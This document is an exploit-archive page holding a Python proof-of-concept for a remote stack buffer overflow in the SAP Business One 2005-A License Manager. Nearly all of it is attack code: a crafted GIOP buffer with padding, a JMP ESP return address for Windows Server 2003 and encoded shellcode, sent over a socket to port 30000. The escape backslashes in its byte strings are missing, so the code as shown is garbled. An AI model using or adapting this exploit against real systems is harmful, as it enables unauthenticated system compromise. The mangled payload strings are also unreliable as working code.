SAP Business One 2005-A License Manager Remote BOF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SAP Business One 2005-A License Manager Remote BOF Exploit
# Published : 2009-08-01
# Author : Bruk0ut
# Previous Title : Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH)
# Next Title : VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)

#!/usr/bin/python
import socket, time


#########################################INFO################################################
# NT_Naming_Service.exe (License Manager 2005 for SAP Business One 2005-A) is               #
# vulnerable to a stack-based buffer overflow allowing for full system compromise by        #
# an unauthenticated user that has TCP/IP access to SAP's license service on TCP port 30000.#
# Mike Arnold ---> mikey27 .::at::. hotmail.com                                             #
############################################################################################


header = ("########################################################################rn"
"#    SAP Business One 2005-A License Manager remote overflow PoC    #rn"     
"#           Tested on 2005-A (6.80.123) SP:00 PL:06                 #rn"
"#                 2005-A (6.80.320) SP:01 PL:34                 #rn"
"#              OS: Windows Server 2003 R2 Std/Ent Service Pack 2      #rn"
"#             Coded by Bruk0ut - mikey27 .::at::. hotmail.com       #rn"
"########################################################################rn")


#metasploit windows/exec - notepad.exe x86/shikata_ga_nai 152 bytes
sc = ("xbfxd6x21x7dx3bxdaxdbxd9x74x24xf4x33xc9x5dxb1"
"x20x31x7dx13x83xc5x04x03x7dxd9xc3x88xc7x0dx47"
"x73x38xcdxc3x36x04x46xafxbdx0cx59xbfx35xa3x41"
"xb4x15x1cx70x21xe0xd7x46x3exf2x09x97x80x6cx79"
"x53xc0xfbx85x9ax0bx0ex8bxdex67xe5xb0x8ax53x02"
"xb2xd7x17x55x18x16xc3x0cxebx14x58x5axb4x38x5f"
"xb7xc0x5cxd4x46x3cxd5xb6x6cxc6x26x19x5cx30xc8"
"xf0xfax37x4excdx89x08x42xa6xfex94xf7x33x96xac"
"x8exbcxe4x6dxfax6cx83x9dx70x88x0cx36x1cx6fx38"
"xc8x4bx6fxdaxbbx1cxfbx40x34x83x67xa5xd1x3bx0d"
"xb9x13")

#JMP ESP 0x773a73fb User32.dll - Server2k3 R2 STD/ENT - SP2
ret = 'xfbx73x3ax77'
giop_header = 'x47x49x4fx50x01x00x01x00'
buff = giop_header + 'x2fx5c' * 500 + "A" * 24 + ret + 'x90' * 44 + sc + 'x90' * 384

print (header)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (('10.0.0.241',30000))
s.setblocking(0)

s.send(buff)
time.sleep(1)
print ("done!")

s.close()

# www.Syue.com [2009-08-01]